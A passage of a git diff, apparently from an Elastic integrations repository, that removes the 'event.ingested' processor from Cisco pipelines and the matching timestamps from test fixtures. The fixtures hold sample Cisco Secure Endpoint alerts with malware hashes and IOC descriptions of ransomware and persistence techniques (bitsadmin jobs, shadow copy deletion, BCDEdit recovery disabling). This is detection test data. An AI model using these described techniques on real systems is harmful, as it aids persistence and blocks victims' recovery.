b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Cisco Meraki processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json index 5342e9a5e2b..0385cd6b714 100644 --- a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json +++ b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:08:51.152643821Z" - }, "message": "2012 Dec 18 14:51:08 Nexus5010-B %AUTHPRIV-3-SYSTEM_MSG: pam_aaa:Authentication failed for user en from 2.2.2.1 - login", "tags": [ "preserve_original_event" diff --git a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml index d916e519ac8..3cb188fd946 100644 --- a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Cisco Nexus processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json index 96c4828064a..c47b6a79304 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -44,7 +44,6 @@ ], "code": "553648147", "id": "6411425813945647000", - "ingested": "2022-02-02T05:52:16.386270601Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "severity": 3 @@ -118,7 +117,6 @@ "action": "Policy Update", "code": "553648130", "id": "6533243623469744000", - "ingested": "2022-02-02T05:52:16.386273541Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -188,7 +186,6 @@ ], "code": "1090519054", "id": "6533241347137077000", - "ingested": "2022-02-02T05:52:16.386274779Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "severity": 2 @@ -285,7 +282,6 @@ ], "code": "553648143", "id": "6533241347137077000", - "ingested": "2022-02-02T05:52:16.386275859Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "severity": 2 @@ -361,7 +357,6 @@ ], "code": "2164260880", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386278374Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "severity": 2 @@ -439,7 +434,6 @@ ], "code": "1090519054", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386279522Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "severity": 2 @@ -542,7 +536,6 @@ ], "code": "1090519054", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386280522Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "severity": 2 @@ -635,7 +628,6 @@ ], "code": "553648143", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386281534Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "severity": 2 @@ -714,7 +706,6 @@ ], "code": "1107296274", "id": "1521138739875754000", - "ingested": "2022-02-02T05:52:16.386282532Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "severity": 2, @@ -801,7 +792,6 @@ ], "code": "1107296274", "id": "1521138739868158500", - "ingested": "2022-02-02T05:52:16.386283546Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "severity": 2, @@ -888,7 +878,6 @@ ], "code": "1107296274", "id": "1521138739846959000", - "ingested": "2022-02-02T05:52:16.386284547Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "severity": 2, @@ -975,7 +964,6 @@ ], "code": "1107296274", "id": "1494576726048000300", - "ingested": "2022-02-02T05:52:16.386285757Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "severity": 2, @@ -1062,7 +1050,6 @@ ], "code": "1107296274", "id": "1494576727672000300", - "ingested": "2022-02-02T05:52:16.386286751Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "severity": 1, @@ -1150,7 +1137,6 @@ ], "code": "1107296274", "id": "1458617561791000300", - "ingested": "2022-02-02T05:52:16.386287743Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "severity": 2, @@ -1231,7 +1217,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386288789Z", "kind": "alert", "original": 